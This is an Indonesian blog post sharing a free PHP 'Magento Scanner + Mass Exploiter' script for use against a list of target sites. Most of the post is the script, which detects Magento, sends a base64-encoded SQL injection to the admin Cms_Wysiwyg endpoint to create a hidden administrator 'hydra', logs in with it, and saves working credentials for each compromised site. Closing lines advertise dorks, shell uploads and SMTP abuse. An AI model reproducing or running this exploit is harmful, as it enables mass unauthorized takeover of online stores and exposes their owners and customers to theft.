Sunday, April 22, 2018

Cara menggunakan Magento Scanner + Mass Exploiter PHP 2018


[UPDATED 10:18 PM 5/13/2018]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%

Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!

cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :

  1. <?php
  2. error_reporting(0);
  3. print '
  4.             #=============================================#
  5.             #       Magento Scanner + Mass Exploiter      #
  6.             #=============================================#
  7. ';
  8. $get=file_get_contents($argv[1])
  9. or die("
  10. \n\tError ! cara penggunaan? visit http://yuzanotes.blogspot.com/
  11. \n\tThanks to synchronizer\n\n");
  12. $j=explode("\r\n",$get);
  13. foreach($j as $url){
  14. $url1 = str_replace('http://','',$url);
  15. $url3 = str_replace('https://','',$url1);
  16. $url2 = 'http://'.$url3;
  17. print "\n\n\t[?] Scanning ".$url1.'..';
  18. $dirnya = "/skin/adminhtml/default/default/reset.css";
  19. $ch1 = curl_init();
  20. curl_setopt ($ch1, CURLOPT_URL, $url2.$dirnya);
  21. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  22. curl_setopt ($ch1, CURLOPT_TIMEOUT, 60);
  23. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  24. curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
  26. $result = curl_exec ($ch1);
  27. curl_close($ch1);
  28.  
  29. if(preg_match('/Magento/', $result)) {
  30. print "\n\t[+] MAGENTO : TRUE";
  31. print "\n\t[+] Exploiting ".$url1."..";
  32. $expage = "/admin/Cms_Wysiwyg/directive/index/";
  33.  
  34. $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  35.  
  36. $ch = curl_init();
  37. curl_setopt ($ch, CURLOPT_URL, $url2.$expage);
  38. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  39. curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  40. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
  42. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  43. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  44. curl_setopt ($ch, CURLOPT_POST, 1);
  45. $headers  = array();
  46. $headers[] = 'Accept-Encoding: gzip, deflate';
  47. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  48.  
  49. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  50. curl_setopt ($ch, CURLOPT_HEADER, 1);
  51. $result = curl_exec ($ch);
  52. curl_close($ch);
  53.  
  54. #Exploitasi berhasil dan memulai cek Login setelah exploitasi
  55. if(preg_match('#200 OK#', $result)) {
  56. print "\n\t[+] Exploiting Success, mulai mengecek login..";
  57. $loginpage = $url2."/admin";
  58. $logindata = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77';
  59.  
  60. $hydra_ch = curl_init();
  61. curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
  62. curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  63. curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
  64. curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
  65. curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
  66. curl_setopt ($hydra_ch, CURLOPT_SSL_VERIFYPEER, 0);
  67. curl_setopt ($hydra_ch, CURLOPT_FOLLOWLOCATION, 1);
  68. curl_setopt ($hydra_ch, CURLOPT_POST, 1);
  69.  
  70. $headers  = array();
  71. $headers[] = 'Accept-Encoding: gzip, deflate';
  72. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  73.  
  74. curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
  75. curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
  76. $hasil = curl_exec ($hydra_ch);
  77. curl_close($hydra_ch);
  78.  
  79. if(preg_match('#302 Moved#', $hasil)) {
  80. #Exploitasi berhasil dan admin user baru benar benar masuk ke database.
  81. $fp = fopen("vuln_magento.txt", "a+");
  82. fwrite($fp, "========================================\n");
  83. fwrite($fp, "WEBSITE  : ".$loginpage."\n");
  84. fwrite($fp, "USERNAME : hydra\n");
  85. fwrite($fp, "PASSWORD : hydra77\n");
  86. fwrite($fp, "========================================\n");
  87. fclose($fp);
  88. print "\n\t[+] Login Success ! \n\t[+] username   : hydra  \n\t[+] password   : hydra77";
  89. print "\n\t[-] Login Page : ".$loginpage."\n";
  90. }
  91. else {
  92. #Exploitasi berhasil dan namun admin user tidak masuk ke database.
  93. print "\n\t[-] Login Failed :( ";
  94. print "\n\t[-] Keterangan : admin user tidak masuk ke database.\n";}
  95. }else {
  96.  
  97. #Exploitasi gagal total
  98. print "\n\t[-] Exploitasi Failed :(\n ";}
  99. }else {
  100. print "\n\t[-] MAGENTO : FALSE\n";
  101. }
  102. }
  103.  
  104. ?>

Dork magento, auto exploit magento versi web, smtp, upload shell, dll. masuk kesini

visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

    Choose :
  • OR
  • To comment
No comments:
Write comments

IBX5AAE15B0D944A